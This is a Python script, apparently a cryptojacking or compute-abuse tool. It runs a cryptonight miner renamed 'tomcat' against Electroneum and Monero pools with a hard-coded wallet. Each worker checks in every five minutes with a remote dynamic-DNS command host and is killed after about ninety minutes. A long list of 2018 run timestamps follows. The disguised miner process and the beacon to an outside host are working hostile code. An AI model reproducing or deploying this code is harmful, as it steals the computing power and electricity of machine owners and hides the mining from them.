import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:36:07.799912
#2018-02-17 17:24:06.032907
#2018-02-17 19:13:06.927920
#2018-02-17 21:01:05.389049
#2018-02-17 22:46:04.118719
#2018-02-18 00:29:03.811449
#2018-02-18 02:20:08.127722
#2018-02-18 04:07:07.019706
#2018-02-18 05:57:06.440943
#2018-02-18 07:48:01.745165
#2018-02-18 09:35:07.984471
#2018-02-18 11:21:04.800659
#2018-02-18 13:07:05.673684
#2018-02-18 14:56:07.053280
#2018-02-18 16:44:05.609992
#2018-02-18 18:33:04.267804
#2018-02-18 20:21:01.198484
#2018-02-18 22:07:01.669151
#2018-02-18 23:55:05.063104
#2018-02-19 01:41:06.634218
#2018-02-19 03:29:04.644736
#2018-02-19 05:14:01.588689
#2018-02-19 06:59:04.729702
#2018-02-19 08:48:05.504860
#2018-02-19 10:37:08.923988
#2018-02-19 12:26:01.352115
#2018-02-19 14:13:01.671415
#2018-02-19 16:04:07.573076
#2018-02-19 17:53:01.518820
#2018-02-19 19:39:05.057952
#2018-02-19 21:26:05.602392
#2018-02-19 23:12:03.854204
#2018-02-20 00:57:04.970866
#2018-02-20 02:47:07.928218
#2018-02-20 04:35:04.075777
#2018-02-20 06:19:01.500948
#2018-02-20 08:04:03.983914
#2018-02-20 09:49:04.219025
#2018-02-20 11:32:06.136616
#2018-02-20 13:20:09.818044
#2018-02-20 15:05:07.104645
#2018-02-20 16:50:13.883745
#2018-02-20 18:38:08.681600
#2018-02-20 20:31:06.297190
#2018-02-20 22:17:01.907256
#2018-02-21 00:01:02.193045
#2018-02-21 01:46:06.460189
#2018-02-21 03:35:07.145895
#2018-02-21 05:24:04.999580
#2018-02-21 07:11:07.529987
#2018-02-21 08:58:02.124109
#2018-02-21 10:46:02.001497
#2018-02-21 12:32:05.765535
#2018-02-21 14:19:01.360073
#2018-02-21 16:06:05.817956
#2018-02-21 17:56:11.252673
#2018-02-21 19:43:08.509135
#2018-02-21 21:31:08.166721
#2018-02-21 23:17:07.742434
#2018-02-22 01:06:03.827276
#2018-02-22 02:53:06.050108
#2018-02-22 04:39:05.136066
#2018-02-22 06:24:01.479701
#2018-02-22 08:11:07.753746
#2018-02-22 09:59:06.595084
#2018-02-22 11:44:06.681918
#2018-02-22 13:30:12.503001
#2018-02-22 15:18:04.786939
#2018-02-22 17:04:08.373040
#2018-02-22 18:51:01.656474
#2018-02-22 20:43:04.054121
#2018-02-22 22:29:04.218552
#2018-02-23 00:13:07.466371
#2018-02-23 02:01:06.756668
#2018-02-23 03:49:07.276542
#2018-02-23 05:42:04.414592
#2018-02-23 07:27:07.150677
#2018-02-23 09:33:07.465395
#2018-02-23 11:40:08.682761
#2018-02-23 13:29:04.524005
#2018-02-23 15:16:04.905200
#2018-02-23 17:03:12.535697
#2018-02-23 18:52:04.988368
#2018-02-23 20:37:05.326466
#2018-02-23 22:24:05.564473
#2018-02-24 00:11:01.352769
#2018-02-24 02:02:08.511202
#2018-02-24 03:54:06.642001
#2018-02-24 05:42:06.532837
#2018-02-24 07:32:07.750956
#2018-02-24 09:19:03.642598
#2018-02-24 11:08:01.889227
#2018-02-24 12:56:01.301236
#2018-02-24 14:43:05.401107
#2018-02-24 16:34:03.757797
#2018-02-24 18:24:04.144338
#2018-02-24 20:11:01.780333
#2018-02-24 21:55:05.682942
#2018-02-25 00:55:07.667980
#2018-02-25 03:53:06.901334
#2018-02-25 06:38:05.063369
#2018-02-25 11:36:05.042691
#2018-02-25 13:30:01.345000
#2018-02-25 15:04:01.877682